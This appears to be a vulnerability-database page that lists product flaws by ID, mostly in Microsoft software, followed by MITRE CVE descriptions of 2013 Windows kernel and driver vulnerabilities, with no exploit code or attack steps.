5.1 DOC Document denial of service [5445] Symantec Endpoint Protection up to 11.0 RU7 MP1 on Windows Server 2003 Network Threat Protection Module denial of service [5368] Microsoft .NET Framework up to 4 privilege escalation [5367] Microsoft .NET Framework up to 4 privilege escalation [5362] Microsoft Office 2003/2007 GDI+ privilege escalation [5360] Microsoft .NET Framework 4 memory corruption [5291] Microsoft Visual Studio 2008 Incremental Linker link.exe ConvertRgImgSymToRgImgSymEx Integer Coercion Error [5268] Microsoft Office 2008 on Mac RTF Pfragment File memory corruption [5080] Microsoft SQL Server 2005/2008/2008R2 CREATE DATABASE sql injection [5050] Microsoft Office 2007 WPS Converter memory corruption [5049] Microsoft SQL Server 2000/2005/2008 MSCOMCTL.OCX privilege escalation [5048] Microsoft Office 2003/2007/2010 MSCOMCTL.OCX privilege escalation [5047] Microsoft .NET Framework up to 4.5 Parameter Validator privilege escalation [5022] Novell GroupWise 2.1.0 on Windows/Linux/NetWare Messenger nmma.exe login memory corruption [5021] Novell GroupWise 2.1.0 on Windows/Linux/NetWare Messenger nmma.exe createsearch memory corruption [4941] Microsoft Security Essentials Antimalware Engine CAB File Parser privilege escalation [4919] Microsoft Security Essentials Antimalware Engine TAR File Parser privilege escalation [4642] Microsoft .NET Framework 2.0 SP2/3.5.1/4 XAML Browser Application privilege escalation [4640] Microsoft SharePoint 2010 inplview.aspx cross site scripting [4636] Microsoft SharePoint 2010 wizardlist.aspx cross site scripting [4635] Microsoft SharePoint 2010 themeweb.aspx cross site scripting [4509] Microsoft .NET Framework 1.1 SP1/2.0 SP2/3.5 SP1/3.5.1/4.0 Forms Authentication Ticket Caching privilege escalation [4508] Microsoft .NET Framework 1.1 SP1/2.0 SP2/3.5 SP1/3.5.1/4.0 Username Parser privilege escalation [4507] Microsoft .NET Framework 2.0 SP2/3.5 SP1/3.5.1/4.0 Forms Authentication privilege escalation [4506] Microsoft .NET Framework 1.1 SP1/2.0 SP2/3.5 SP1/3.5.1/4.0 ASP.NET Hash denial of service [4482] Microsoft Word 2007/2010/2011 Document Parser denial of service [4480] Microsoft Excel 2003 privilege escalation [4477] Microsoft PowerPoint 2007 SP2/2008 OfficeArt privilege escalation [4473] Microsoft PowerPoint 2007 SP2/2010 DLL-Loader privilege escalation [4471] Microsoft Office 2003/2007 Publisher privilege escalation [4470] Microsoft Office 2003 SP3 privilege escalation [4469] Microsoft Office Publisher privilege escalation [4453] Microsoft Excel 2003 Record Parser privilege escalation [4446] Microsoft Office 2007/2008 OfficeArt Record Parser privilege escalation [4445] Microsoft Office 2007/2010/2011 Word Document Parser denial of service [4414] Microsoft SharePoint 2010 cross site scripting [4413] Microsoft SharePoint 2010/2007/3.0 XML/XLS information disclosure [4412] Microsoft Office 2003/2007 Library Loader privilege escalation [4411] Microsoft Excel 2003 denial of service [4397] Microsoft .NET Framework 3.5 SP1/4.x Chart Control information disclosure [4391] Microsoft .NET Framework 2.0 SP2/3.5.1/4 Socket Restriction information disclosure [4370] Microsoft .NET Framework up to SP2 Array privilege escalation [4369] Microsoft Excel 2002/2003/2007 privilege escalation [4349] Microsoft Office 2004/2007/2008 Presentation File Parser privilege escalation [4348] Microsoft PowerPoint 2002/2003/2007 privilege escalation [4334] Microsoft .NET Framework 2.0 SP2/3.5 SP1/3.5.1/4.0 JIT Compiler privilege escalation [4332] Microsoft PowerPoint 2007/2010 privilege escalation [4289] Microsoft Excel 2007 Shape Data Parser denial of service [4286] Microsoft PowerPoint 2002 SP3/2003 SP3/2004/2007 SP2/2008 OfficeArt Container Parser privilege escalation [4246] Oracle Database Server 11.1.0.7/11.2.0.1 on Windows Cluster Verify Utility unknown vulnerability [4234] Microsoft IIS 7.5 FTP Server memory corruption [4230] Microsoft Exchange 2007 on 64-bit RPC store.exe denial of service [4229] Microsoft SharePoint 2007 Document Conversion Launcher Service unknown vulnerability [4200] Microsoft .NET Framework 4.0 on 64-bit JIT Compiler privilege escalation [4197] Microsoft SharePoint 2007/3.0 cross site scripting [4196] Microsoft Word 2002/2003/2007/2010 memory corruption [4186] Microsoft Outlook 2002/2003/2007 Content Parser memory corruption [4180] Microsoft IIS 5.1/6.0/7.0/7.5 memory corruption [4179] Microsoft IIS 7.5 FastCGI memory corruption [4159] Microsoft Excel 2002/2003 SXDB PivotTable privilege escalation [4146] Microsoft Outlook 2002/2003/2007 SMB Attachment PR_ATTACH_METHOD privilege escalation [4145] Microsoft Access 2003/2007 ActiveX ACCWIZ.dll privilege escalation [4133] Microsoft Office 2003/2007/Xp COM Object Instantiator privilege escalation [4125] Microsoft SharePoint 2007/3.0 help.aspx cross site scripting [4090] Microsoft Excel 2002/2003/2007 privilege escalation [4082] Microsoft PowerPoint 2002 SP3 memory corruption [4074] Microsoft IIS 5.0/5.06/5.1/6.0 ASP privilege escalation [4069] Microsoft Project 2003/2007 Project Memory Validator denial of service [4057] Microsoft Excel memory corruption [4056] Microsoft Word 2002/2003 File Information Block Parser memory corruption [4024] Microsoft IIS 5.0/6.0/7.0 FTP Server denial of service [4000] Microsoft Office 2003/Sp3/Xp Web Components privilege escalation [3999] Microsoft Office 2007 Pointer privilege escalation [3974] Microsoft PowerPoint 2000/2002/2003 Sound Data memory corruption [3973] Microsoft PowerPoint 2000/2002/2003 Notes Container memory corruption [3972] Microsoft PowerPoint 2000/2002/2003 BuildList memory corruption [3971] Microsoft PowerPoint 2000/2002/2003 Object memory corruption [3970] Microsoft PowerPoint 2000/2002/2003 Paragraph memory corruption [3969] Microsoft PowerPoint 2000/2002/2003 Atom memory corruption [3952] Microsoft ISA Server 2004/2006 denial of service [3946] Microsoft PowerPoint 2000/2002/2003/2004 privilege escalation [3932] Microsoft Excel 2000/2002/2003/2004/2007 Object Reference privilege escalation [3896] Microsoft SQL Server up to 2005 sp_replwritetovarbin memory corruption [3892] Microsoft Excel 2000/2002/2003 Formula denial of service [3891] Microsoft Excel 2000/2002/2003 denial of service [3890] Microsoft Excel 2000/2002/2003 NAME Index denial of service [3889] Microsoft Word 2000/2002/2003/2007 Table Property memory corruption [3888] Microsoft Word 2000/2002/2003/2007 RTF Stylesheet denial of service [3887] Microsoft Word 2000/2002/2003/2007 denial of service [3886] Microsoft Word 2000/2002/2003/2007 ControlWord memory corruption [3885] Microsoft Word 2000/2002/2003/2007 denial of service [3884] Microsoft Word 2000/2002/2003/2007 denial of service [3883] Microsoft Word 2000/2002/2003/2007 RTF memory corruption [3882] Microsoft Word 2000/2002/2003/2007 LFO privilege escalation [3844] Microsoft Excel 2003 REPT Numeric Error [3843] Microsoft Excel up to 2007 BIFF File denial of service [3842] Microsoft Excel 2003 VBA Performance Cache denial of service [3841] Microsoft Office Xp CDO URI cross site scripting [3799] Microsoft Visual Studio 6 Masked Edit Control memory corruption [3796] Microsoft Office 2000 WPG privilege escalation [3795] Microsoft Office 2000/2003/Xp BMP Image BMPIMP32.FLT denial of service [3794] Microsoft Office 2000/2003/Xp PICT bits_per_pixel denial of service [3793] Microsoft Office 2000/2003/Xp PICT denial of service [3792] Microsoft Office 2000 EPS File privilege escalation [3783] Microsoft Word 2002 denial of service [3782] Microsoft SQL Server Statement Numeric Error [3781] Microsoft SQL Server Database Backup File memory corruption [3780] Microsoft SQL Server Query Type Conversion memory corruption [3779] Microsoft SQL Server Memory Page Reuse information disclosure [3778] Microsoft Exchange 2003/2007 Outlook Web Access cross site scripting [3701] Microsoft Word 2003 CSS privilege escalation [3700] Microsoft Word 2003 RTF Document privilege escalation [3649] Microsoft Office up to XP privilege escalation [3648] Microsoft Excel 2003 privilege escalation [3647] Microsoft Outlook up to 2007 mailto URI privilege escalation [3552] Microsoft Excel 2000/2002/2003 File memory corruption [3491] Microsoft Web Proxy Auto-Discovery Feature unknown vulnerability [3373] Microsoft Word 2000/2002 privilege escalation [3309] Microsoft Visual Studio 6 ActiveX Control VBTOVSI.dll directory traversal [3308] Microsoft Visual Studio 6 ActiveX Control PDWizard.ocx directory traversal [3241] Microsoft Excel 2000/2003/2004/XP SP3 rtWnDesk memory corruption [3176] Microsoft Excel 2000/2002/2003/2007 File Attribute memory corruption [3175] Microsoft Excel 2000/2002/2003/2007 Active Worksheet memory corruption [3174] Microsoft Excel 2000/2002/2003/2007 Version Information memory corruption [3172] Microsoft Office Publisher 2007 Pointer denial of service [3067] Microsoft Office 2000/2003/2004/2007/Xp Drawing Object denial of service [3065] Microsoft Excel 2000/2002/2003/2007 Filter memory corruption [3064] Microsoft Excel 2000/2002/2003/2004/2007 set Font memory corruption [3063] Microsoft Excel 2000/2002/2003/2007 BIFF Record memory corruption [3053] Microsoft Excel Viewer 3.x OCX ActiveX Control memory corruption [3050] Microsoft Word Viewer 3.x OCX ActiveX Control memory corruption [3049] Microsoft PowerPoint Viewer 3.x OCX ActiveX Control memory corruption [3048] Microsoft Excel Viewer 3.x OCX ActiveX Control memory corruption [2939] Microsoft Word 2000 memory corruption [2894] Microsoft Office 2000/2003/2004/Xp Undefined String Format String [2884] Microsoft Word 2000/2002/2003 memory corruption [2810] Microsoft Outlook 2000/2002/2003 Office Saved Search memory corruption [2809] Microsoft Outlook 2000/2002/2003 Header denial of service [2808] Microsoft Outlook 2000/2002/2003 Meeting denial of service [2807] Microsoft Excel 2000/2002/2003 XLS File privilege escalation [2765] Microsoft Project Server 2003 pdsrequest.asp weak authentication [2718] Microsoft Word 2000/2002/2003 DOC Document memory corruption [2695] Alt-N MDaemon 9.0.5/9.0.6/9.51/9.53 on Windows privilege escalation [2610] Microsoft PowerPoint 2003 PPT Document denial of service [2597] Microsoft Office 2003/Xp Smart-Tag Parser memory corruption [2596] Microsoft Office 2000/2003/2004/Xp Value Read privilege escalation [2595] Microsoft Office 2000/2001/2003/2004 Diagram Value privilege escalation [2594] Microsoft Office 2000/2001/2003/2004 Document memory corruption [2571] Microsoft PowerPoint up to 2003 Document privilege escalation [2554] Microsoft PowerPoint 2000 memory corruption [2508] Microsoft Word 2000 memory corruption [2452] Apache HTTP Server up to 2.2.3 on Windows mod_alias unknown vulnerability [2437] Microsoft Office up to XP Filename memory corruption [2383] Citrix MetaFrame 1.8/3.0 on Windows Registry Permission privilege escalation [2382] Microsoft PowerPoint up to 2003 Presentation Open/Close memory corruption [2378] Microsoft PowerPoint 2000/2002/2003 Document Parser memory corruption [2367] Microsoft Office 2000/2003/XP Document String privilege escalation [2365] Microsoft Office 2000/2003/XP PNG Image memory corruption [2364] Microsoft Office 2000/2003/XP GIF Image memory corruption [2357] Microsoft Excel up to 2003 on Asian System Document Repair Style memory corruption [2349] Novell GroupWise up to 7.0 on Windows API Email unknown vulnerability [2325] Microsoft Excel up to 2003 Hyperlink hlink.dll memory corruption [2324] Microsoft Excel 2000/2002/2003/2004 XLS File memory corruption [2312] Microsoft Exchange 2000 Outlook Web Access cross site scripting [2308] Microsoft PowerPoint 2000/2002/2003/2004 PPT Document memory corruption [2294] Microsoft Word up to 2003 DOC Document privilege escalation [2263] Cisco VPN Client up to 4.8.01.0300 on Windows privilege escalation [2253] Microsoft Word up to 2003 privilege escalation [2217] Microsoft Exchange 2000/2003 Calender Collaboration Data Object memory corruption [2190] Microsoft Office 2003 mailto URI unknown vulnerability [2084] Microsoft Excel 95/97/2000/2002/2003 File memory corruption [2083] Microsoft Office up to XP Routing Slip memory corruption [2075] Microsoft Visual Studio 6 dbp File memory corruption [2053] Microsoft Office/Visio/Project 2003 Korean Input Method Editor privilege escalation [2052] Microsoft PowerPoint 2000 HTML Rendering information disclosure [1975] PostgreSQL up to 8.1.1 on Windows Multiple Connection denial of service [1971] Microsoft Visual Studio 2005 Form Loader load memory corruption [1964] Microsoft Exchange 5/5.5/2000 Email memory corruption [1963] Microsoft Outlook 2000/2002/2003 TNEF MIME Attachment Integer Coercion Error [1947] PHP 4.3.10/4.4.0/4.4.1/4.4.2 on Windows mysql_connect memory corruption [1928] Microsoft IIS 5.1 Virtual Directory privilege escalation [1790] Microsoft Exchange 2000 SMTP Collaboration Data Object memory corruption [1737] Microsoft Exchange 2003 IMAP4 Service Store.exe denial of service [1704] Microsoft IIS 5.1/6 privilege escalation [1699] Veritas Backup Exec up to 8.6 on Windows unknown vulnerability [1697] Novell eDirectory 8.7.3 on Windows iMonitor memory corruption [1669] Microsoft Word 2000 Shared Sections denial of service [1668] Microsoft PowerPoint 2000 Shared Sections denial of service [1667] Microsoft Outlook 2000 Shared Sections denial of service [1666] Microsoft Office 2000 Shared Sections denial of service [1665] Microsoft Excel 2000 Shared Sections denial of service [1664] Microsoft Access 2000 Shared Sections denial of service [1644] Sun MySQL up to 4.1.9 on Windows denial of service [1597] Microsoft Word 2000/2002 Font Parser memory corruption [1571] Microsoft Exchange 5.5 Outlook Web Access cross site scripting [1351] Microsoft Exchange 2000/2003 SMTP Service memory corruption [1348] Microsoft MSN Messenger up to 7.0beta GIF Image memory corruption [1273] Sun MySQL up to 4.1.9 on Windows MS DOS Device Name denial of service [1269] Microsoft Exchange 2003 Sub-Directories Store.exe denial of service [1210] IBM DB2 up to 8.1 FP8 on Windows unknown vulnerability [1192] Microsoft Office 2000/2002/XP URL memory corruption [1188] Microsoft Exchange 2003 Outlook Web Access owalogon.asp information disclosure [1154] Microsoft Office RC4 IV unknown vulnerability [981] Microsoft Proxy Server/ISA Server up to 2000 DNS Revese Lookup Cache weak authentication [961] Microsoft ISA Server HTTP Keep-Alive weak authentication [881] Microsoft Excel 2000/2001/2002 memory corruption [877] Microsoft Word 2002 DOC Document denial of service [865] IBM DB2 Universal Database 7.x/8.x on Windows memory corruption [857] Microsoft SQL Server up to 7.0 SP4 memory corruption [832] Microsoft WordPerfect memory corruption [783] Microsoft Exchange 5.5 Outlook Web Access HTML Redirection cross site scripting [762] Microsoft IIS 4.0 Redirect memory corruption [751] Microsoft Word Email privilege escalation [705] Microsoft ISA Server 2000 SP2 Web Proxy denial of service [704] Microsoft ISA Server 2000 SP2 Web Proxy privilege escalation [703] Microsoft ISA Server 2000 SP2 Web Proxy denial of service [702] Microsoft ISA Server 2000 SP2 External HTTP Traffic weak encryption [701] Microsoft ISA Server 2000 SP2 ICMP unknown vulnerability [700] Trend Micro OfficeScan up to Corporate 5.58 Windows Help unknown vulnerability [694] PHP up to 4.3.6 on Windows escapeshellcmd/escapeshellarg privilege escalation [663] Microsoft Outlook 2003 RTF Document OLE Object containing privilege escalation [652] Microsoft Outlook 2003 HTML Mail Reply privilege escalation [649] Microsoft IIS information disclosure [574] Trend Micro VirusWall up to 3.52 Build1466 on Windows /ishttpd/localweb/java/ directory traversal [553] Microsoft Messenger 6.0/6.1 File Request information disclosure [551] Microsoft Outlook 2002/XP mailto cross site scripting [479] Microsoft Exchange 2003 Outlook Web Access information disclosure [477] Microsoft ISA Server 2000 H.323 Filter memory corruption [476] Microsoft ISA Server 2000 H.323/H.225.0/Q.931 memory corruption [467] Microsoft IIS up to 6.0 privilege escalation [459] Microsoft IIS 5.0 Configuration [419] Microsoft Exchange 2003 Outlook Web Access information disclosure [407] Microsoft Messenger up to 6.0 MSG Message unknown vulnerability [385] Microsoft Excel up to 2002 Macro Security memory corruption [384] Microsoft Word 97/98/2000/2002 Macro Name memory corruption [334] Microsoft Exchange 5.5 Outlook Web Access cross site scripting [333] Microsoft Exchange 5.5/2000 SMTP Service memory corruption [307] IBM DB2 Universal Database 7.x on Windows INVOKE memory corruption [263] Microsoft Word 97/98/2000/2002 Macro privilege escalation [262] Microsoft Office 97/2000/XP HTML memory corruption [244] Sun MySQL 3/4 on Windows my.ini weak encryption [233] Microsoft IIS 4.0/5.0/5.1 /.asp unknown vulnerability [199] Microsoft MSDE/SQL Server 2000 LPC memory corruption [198] Microsoft SQL Server 7/2000 Named Pipe privilege escalation [197] Microsoft MSDE/SQL Server 7/2000 Named Pipe Session privilege escalation [190] Microsoft IIS 6.0 Admin Interface weak authentication [189] Microsoft IIS 6.0 Admin Interface weak authentication [187] Microsoft IIS 6.0 Admin Interface cross site scripting [183] Microsoft Messenger 6.0 Build 6.0.0501 Image Transfer memory corruption [177] Microsoft ISA Proxy 2000 Error Site cross site scripting [173] Microsoft SQL Server 7/2000 Index.PHP memory corruption [159] Microsoft SQL Server on Win NT/2000/XP Named Pipe xp_fileexist unknown vulnerability [157] Microsoft Exchange 5.5/2000 HTML Attachment cross site scripting [86] Microsoft IIS 5.0/5.1 WebDAV denial of service [85] Microsoft IIS 4.0/5.0 ASP Response.AddHeader memory corruption [84] Microsoft IIS 5.0 Server Side Includes SSINC.DLL memory corruption [83] Microsoft IIS 4.0/5.0/5.1 Error Message cross site scripting [82] Microsoft IIS 4.0/5.0 nsiislog.dll denial of service [62] Microsoft .NET Framework Passport unknown vulnerability [43] Microsoft Outlook Express MHTML memory corruption [15] Microsoft IIS 5.0 WebDav memory corruption [12] Microsoft Outlook 2000/Express 6 window.PopUp privilege escalation MITRE CVE - https://cve.mitre.org: [CVE-2013-3661] The EPATHOBJ::bFlatten function in win32k.sys in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT does not check whether linked-list traversal is continually accessing the same list member, which allows local users to cause a denial of service (infinite traversal) via vectors that trigger a crafted PATHRECORD chain. [CVE-2013-3660] The EPATHOBJ::pprFlattenRec function in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, and Windows Server 2012 does not properly initialize a pointer for the next object in a certain list, which allows local users to obtain write access to the PATHRECORD chain, and consequently gain privileges, by triggering excessive consumption of paged memory and then making many FlattenPath function calls, aka "Win32k Read AV Vulnerability." [CVE-2013-3174] DirectShow in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, and Windows Server 2012 allows remote attackers to execute arbitrary code via a crafted GIF file, aka "DirectShow Arbitrary Memory Overwrite Vulnerability." [CVE-2013-3173] Buffer overflow in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT allows local users to gain privileges via a crafted application that leverages improper handling of objects in memory, aka "Win32k Buffer Overwrite Vulnerability." [CVE-2013-3172] Buffer overflow in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, and Windows 7 SP1 allows local users to cause a denial of service (system hang) via a crafted application that leverages improper handling of objects in memory, aka "Win32k Buffer Overflow Vulnerability." [CVE-2013-3167] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, and Windows 7 SP1 does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "Win32k Information Disclosure Vulnerability." [CVE-2013-3154] The signature-update functionality in Windows Defender on Microsoft Windows 7 and Windows Server 2008 R2 relies on an incorrect pathname, which allows local users to gain privileges via a Trojan horse application in the %SYSTEMDRIVE% top-level directory, aka "Microsoft Windows 7 Defender Improper Pathname Vulnerability." [CVE-2013-3138] Integer overflow in the TCP/IP kernel-mode driver in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT allows remote attackers to cause a denial of service (system hang) via crafted TCP packets, aka "TCP/IP Integer Overflow Vulnerability." [CVE-2013-3136] The kernel in Microsoft Windows XP SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, Windows 7 SP1, and Windows 8 on 32-bit platforms does not properly handle unspecified page-fault system calls, which allows local users to obtain sensitive information from kernel memory via a crafted application, aka "Kernel Information Disclosure Vulnerability." [CVE-2013-3127] The Microsoft WMV video codec in wmv9vcm.dll, wmvdmod.dll in Windows Media Format Runtime 9 and 9.5, and wmvdecod.dll in Windows Media Format Runtime 11 and Windows Media Player 11 and 12 allows remote attackers to execute arbitrary code via a crafted media file, aka "WMV Video Decoder Remote Code Execution Vulnerability." [CVE-2013-2558] Unspecified vulnerability in Microsoft Windows 8 allows remote attackers to cause a denial of service (reboot) or possibly have unknown other impact via a crafted TrueType Font (TTF) file, as demonstrated by the 120612-69701-01.dmp error report. [CVE-2013-2556] Unspecified vulnerability in Microsoft Windows 7 allows attackers to bypass the ASLR protection mechanism via unknown vectors, as demonstrated against Adobe Flash Player by VUPEN during a Pwn2Own competition at CanSecWest 2013. [CVE-2013-2554] Unspecified vulnerability in Microsoft Windows 7 allows attackers to bypass the ASLR and DEP protection mechanisms via unknown vectors, as demonstrated against Firefox by VUPEN during a Pwn2Own competition at CanSecWest 2013, a different vulnerability than CVE-2013-0787. [CVE-2013-2553] Unspecified vulnerability in the kernel in Microsoft Windows 7 allows local users to gain privileges via unknown vectors, as demonstrated by Nils and Jon of MWR Labs during a Pwn2Own competition at CanSecWest 2013, a different vulnerability than CVE-2013-0912. [CVE-2013-2552] Unspecified vulnerability in Microsoft Internet Explorer 10 on Windows 8 allows remote attackers to bypass the sandbox protection mechanism by leveraging access to a Medium integrity process, as demonstrated by VUPEN during a Pwn2Own competition at CanSecWest 2013. [CVE-2013-1345] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "Win32k Vulnerability." [CVE-2013-1340] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "Win32k Dereference Vulnerability." [CVE-2013-1339] The Print Spooler in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT does not properly manage memory during deletion of printer connections, which allows remote authenticated users to execute arbitrary code via a crafted request, aka "Print Spooler Vulnerability." [CVE-2013-1337] Microsoft .NET Framework 4.5 does not properly create policy requirements for custom Windows Communication Foundation (WCF) endpoint authentication in certain situations involving passwords over HTTPS, which allows remote attackers to bypass authentication by sending queries to an endpoint, aka "Authentication Bypass Vulnerability." [CVE-2013-1334] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "Win32k Window Handle Vulnerability." [CVE-2013-1333] Buffer overflow in win32k.sys in the kernel-mode drivers in Microsoft Windows 7 SP1 allows local users to gain privileges via a crafted application that leverages improper handling of objects in memory, aka "Win32k Buffer Overflow Vulnerability." [CVE-2013-1332] dxgkrnl.sys (aka the DirectX graphics kernel subsystem) in the kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "DirectX Graphics Kernel Subsystem Double Fetch Vulnerability." [CVE-2013-1313] Object Linking and Embedding (OLE) Automation in Microsoft Windows XP SP3 does not properly allocate memory, which allows remote attackers to execute arbitrary code via a crafted RTF document, aka "OLE Automation Remote Code Execution Vulnerability." [CVE-2013-1305] HTTP.sys in Microsoft Windows 8, Windows Server 2012, and Windows RT allows remote attackers to cause a denial of service (infinite loop) via a crafted HTTP header, aka "HTTP.sys Denial of Service Vulnerability." [CVE-2013-1300] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "Win32k Memory Allocation Vulnerability." [CVE-2013-1299] Microsoft Windows Modern Mail allows remote attackers to spoof link targets via a crafted HTML e-mail message. [CVE-2013-1295] The Client/Server Run-time Subsystem (CSRSS) in Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista SP2, and Server 2008 SP2 does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "CSRSS Memory Corruption Vulnerability." [CVE-2013-1294] Race condition in the kernel in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allows local users to gain privileges via a crafted application that leverages improper handling of objects in memory, aka "Kernel Race Condition Vulnerability." [CVE-2013-1293] The NTFS kernel-mode driver in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges or cause a denial of service (NULL pointer dereference and system crash) via a crafted application that leverages improper handling of objects in memory, aka "NTFS NULL Pointer Dereference Vulnerability." [CVE-2013-1292] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allows local users to gain privileges via a crafted application that leverages improper handling of objects in memory, aka "Win32k Race Condition Vulnerability." [CVE-2013-1291] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, Windows 7 Gold and SP1, and Windows 8 allows local users to cause a denial of service (reboot) via a crafted OpenType font, aka "OpenType Font Parsing Vulnerability" or "Win32k Font Parsing Vulnerability." [CVE-2013-1287] The USB kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, and Windows Server 2012 do not properly handle objects in memory, which allows physically proximate attackers to execute arbitrary code by connecting a crafted USB device, aka "Windows USB Descriptor Vulnerability," a different vulnerability than CVE-2013-1285 and CVE-2013-1286. [CVE-2013-1286] The USB kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, and Windows Server 2012 do not properly handle objects in memory, which allows physically proximate attackers to execute arbitrary code by connecting a crafted USB device, aka "Windows USB Descriptor Vulnerability," a different vulnerability than CVE-2013-1285 and CVE-2013-1287. [CVE-2013-1285] The USB kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, and Windows Server 2012 do not properly handle objects in memory, which allows physically proximate attackers to execute arbitrary code by connecting a crafted USB device, aka "Windows USB Descriptor Vulnerability," a different vulnerability than CVE-2013-1286 and CVE-2013-1287. [CVE-2013-1284] Race condition in the kernel in Microsoft Windows 8, Windows Server 2012, and Windows RT allows local users to gain privileges via a crafted application that leverages improper handling of objects in memory, aka "Kernel Race Condition Vulnerability." [CVE-2013-1283] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allows local users to gain privileges via a crafted application that leverages improper handling of objects in memory, aka "Win32k Race Condition Vulnerability." [CVE-2013-1281] The NFS server in Microsoft Windows Server 2008 R2 and R2 SP1 and Server 2012 allows remote attackers to cause a denial of service (NULL pointer dereference and reboot) via an attempted renaming of a file or folder located on a read-only share, aka "NULL Dereference Vulnerability." [CVE-2013-1280] The kernel in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "Windows Kernel Reference Count Vulnerability." [CVE-2013-1279] Race condition in the kernel in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allows local users to gain privileges via a crafted application that leverages incorrect handling of objects in memory, aka "Kernel Race Condition Vulnerability," a different vulnerability than CVE-2013-1278. [CVE-2013-1278] Race condition in the kernel in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allows local users to gain privileges via a crafted application that leverages incorrect handling of objects in memory, aka "Kernel Race Condition Vulnerability," a different vulnerability than CVE-2013-1279. [CVE-2013-1277] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1276] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. 